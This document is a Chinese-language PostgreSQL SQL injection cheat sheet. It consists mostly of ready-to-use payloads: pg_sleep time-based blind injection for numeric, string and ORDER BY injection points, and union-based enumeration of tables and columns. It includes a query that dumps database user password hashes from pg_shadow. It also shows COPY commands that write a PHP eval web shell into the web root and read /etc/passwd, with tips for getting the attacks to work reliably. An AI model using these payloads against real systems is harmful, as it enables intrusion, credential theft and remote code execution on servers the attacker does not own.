数字型: (SELECT * FROM [TABLE] WHERE [COLUMN]=1|(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- -
字符串型: (SELECT * FROM [TABLE] WHERE [COLUMN] = 'asd'::varchar||(SELECT (SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN 1 ELSE 2 END))) ss; -- -
(ss 是 PostgreSQL 对 FROM 中子查询强制要求的别名,不能省略;pg_sleep 的参数单位是秒。时间盲注以响应时间为判据,实测前先记录基线响应时间,并可先用较短延时验证,避免网络抖动造成误判。)
注入语句为
(SELECT * FROM address WHERE address=''||(SELECT CASE WHEN (SELECT COUNT((SELECT username FROM staff WHERE username SIMILAR TO 'M%')))<>0 THEN pg_sleep(20) ELSE '' END)) ss; -- -;
最终效果为:
SELECT address FROM (SELECT * FROM address WHERE address=''||(SELECT CASE WHEN (SELECT COUNT((SELECT username FROM staff WHERE username SIMILAR TO 'M%')))<>0 THEN pg_sleep(20) ELSE '' END)) ss; -- -;
根据 SELECT username FROM staff WHERE username SIMILAR TO 'M%' 是否返回行,它会休眠20秒或者什么也不做,因此可以按字符逐位 fuzz 出数据。注意内层 (SELECT username FROM staff WHERE ...) 是标量子查询:一旦匹配到多行,PostgreSQL 会报错 "more than one row returned by a subquery used as an expression",查询直接出错、不会休眠,观察结果会被误判为"假"。更稳妥的写法是 (SELECT COUNT(*) FROM staff WHERE username SIMILAR TO 'M%')<>0,或给内层子查询加 LIMIT 1。
ORDER BY 注入点
注入点测试:是否延时
(SELECT CASE WHEN COUNT((SELECT pg_sleep(20)))<>0 THEN true ELSE false END); -- -
利用order by的true或者false
(SELECT CASE WHEN COUNT((SELECT (SELECT CASE WHEN COUNT((SELECT username FROM staff WHERE username SIMILAR TO 'M%'))<>0 THEN pg_sleep(20) ELSE '' END)))<>0 THEN true ELSE false END); -- -
正常情况下外层 CASE 总会得到 true 或 false,所以放在 ORDER BY 中语法始终合法;但真正的信号不是这个布尔值(ORDER BY 位置看不到它),而是内层子查询是否休眠了20秒。
内层 CASE 根据 SELECT username FROM staff WHERE username SIMILAR TO 'M%' 是否返回行(即 staff 表中是否存在以 M 开头的用户名)决定执行 pg_sleep(20) 还是返回空串。
因此判断只能靠响应时间,使用前先测基线响应时间;同样要注意该内层标量子查询匹配多行时会报错而不是休眠。
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n--
and 1=2 union select column_name,null,null from information_schema.columns where table_name='admin' limit 1 offset n--
(union 的列数和各列类型必须与原查询一致,null 用来占位;offset n 从 0 开始递增。不加 where table_schema='public' 之类的过滤时,information_schema.tables 也会返回 pg_catalog / information_schema 自身的表。)
(老版本) pg_class.oid 对应 pg_attribute.attrelid;pg_class.relname 为表名,pg_attribute.attname 为字段名:
select relname from pg_class 获取表名(可加 where relkind='r' 只看普通表)
select oid from pg_class where relname='admin' 获取表的 oid
select attname from pg_attribute where attrelid='oid的值' 获取字段名(建议加 and attnum>0 and not attisdropped:attnum<=0 是 ctid/xmin 等系统列,attisdropped 是已删除的列)
获取数据
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0-- 爆数据库用户密码(chr(124) 即分隔符 |)
(pg_shadow 只有超级用户能读,普通账号会报 permission denied,可改查 pg_user / pg_roles 获取用户名(passwd 列被屏蔽);passwd 字段是 md5 或 SCRAM-SHA-256 哈希而非明文,需要离线破解。)
读写文件
老版本写文件: create table beach(shell text) insert into beach values('<?php eval($_POST[c])?>') copy beach(shell) to '/var/www/html/shell.php' drop table beach
#PS: PostgreSQL 8.2 及以上可以用 copy (select '<?php eval($_POST[c])?>') to '/var/www/html/shell.php' 一条语句直接写文件,无需建表;权限要求与上面相同(超级用户或 PostgreSQL 11+ 的 pg_write_server_files 角色),路径同样位于数据库服务器上。
老版本读文件: create table beach(shell text) copy beach(shell) from '/etc/passwd' select * from beach limit 1 offset n读每一行